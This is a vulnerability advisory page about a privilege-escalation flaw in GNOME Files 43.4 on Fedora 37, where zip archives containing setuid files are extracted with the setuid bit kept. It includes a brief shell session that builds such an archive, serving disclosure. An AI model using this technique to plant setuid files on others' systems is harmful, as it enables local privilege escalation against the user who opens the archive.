Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- GNOME Files 43.4 Privilege Escalation[6]
- Authored by Georgi Guninski[7]
-
GNOME Files version 43.4 (nautilus) on Fedora 37 will extract zip archives with setuid files for other user identifiers that can be leveraged to escalate privileges.
- systems | linux[8], fedora[9]
- SHA-256 |
ac80117ac673973985c2dd78f43ddd88009c6d2d28c771696ceaab5aceb3f410
- Download[10] | Favorite[11] | View[12]
Change Mirror[13] Download[14]
Affected: GNOME Files 43.4 (nautilus) on fedora 37
Description:
If an user A opens in GNOME files zip archive containing
`setuid` file F, then F will be silently extracted to
a subdirectory of CWD.
If F is accessible by hostile local user B and B executes F,
then F will be executed as from user A.
tar(1) and unzip(1) are not vulnerable to this attack.
Session for creating the ZIP.
After that just open f.zip in GNOME files.
<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive: f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>
File Tags
- ActiveX[20] (932)
- Advisory[21] (81,913)
- Arbitrary[22] (16,188)
- BBS[23] (2,859)
- Bypass[24] (1,740)
- CGI[25] (1,026)
- Code Execution[26] (7,273)
- Conference[27] (679)
- Cracker[28] (841)
- CSRF[29] (3,342)
- DoS[30] (23,412)
- Encryption[31] (2,369)
- Exploit[32] (51,815)
- File Inclusion[33] (4,221)
- File Upload[34] (972)
- Firewall[35] (821)
- Info Disclosure[36] (2,766)
- Intrusion Detection[37] (892)
- Java[38] (3,043)
- JavaScript[39] (858)
- Kernel[40] (6,666)
- Local[41] (14,447)
- Magazine[42] (586)
- Overflow[43] (12,690)
- Perl[44] (1,423)
- PHP[45] (5,141)
- Proof of Concept[46] (2,338)
- Protocol[47] (3,601)
- Python[48] (1,535)
- Remote[49] (30,747)
- Root[50] (3,579)
- Rootkit[51] (508)
- Ruby[52] (612)
- Scanner[53] (1,639)
- Security Tool[54] (7,883)
- Shell[55] (3,180)
- Shellcode[56] (1,214)
- Sniffer[57] (894)
- Spoof[58] (2,206)
- SQL Injection[59] (16,359)
- TCP[60] (2,404)
- Trojan[61] (687)
- UDP[62] (891)
- Virus[63] (664)
- Vulnerability[64] (31,763)
- Web[65] (9,660)
- Whitepaper[66] (3,749)
- x86[67] (962)
- XSS[68] (17,921)
- Other[69]
File Archives
- August 2023[70]
- July 2023[71]
- June 2023[72]
- May 2023[73]
- April 2023[74]
- March 2023[75]
- February 2023[76]
- January 2023[77]
- December 2022[78]
- November 2022[79]
- October 2022[80]
- September 2022[81]
- Older[82]
Systems
- AIX[83] (428)
- Apple[84] (2,002)
- BSD[85] (373)
- CentOS[86] (57)
- Cisco[87] (1,922)
- Debian[88] (6,808)
- Fedora[89] (1,692)
- FreeBSD[90] (1,244)
- Gentoo[91] (4,322)
- HPUX[92] (879)
- iOS[93] (351)
- iPhone[94] (108)
- IRIX[95] (220)
- Juniper[96] (67)
- Linux[97] (46,407)
- Mac OS X[98] (686)
- Mandriva[99] (3,105)
- NetBSD[100] (256)
- OpenBSD[101] (484)
- RedHat[102] (13,704)
- Slackware[103] (941)
- Solaris[104] (1,610)
- SUSE[105] (1,444)
- Ubuntu[106] (8,799)
- UNIX[107] (9,286)
- UnixWare[108] (186)
- Windows[109] (6,568)
- Other[110]
- Services
- Security Services[121]
- Hosting By
- Rokasec[122]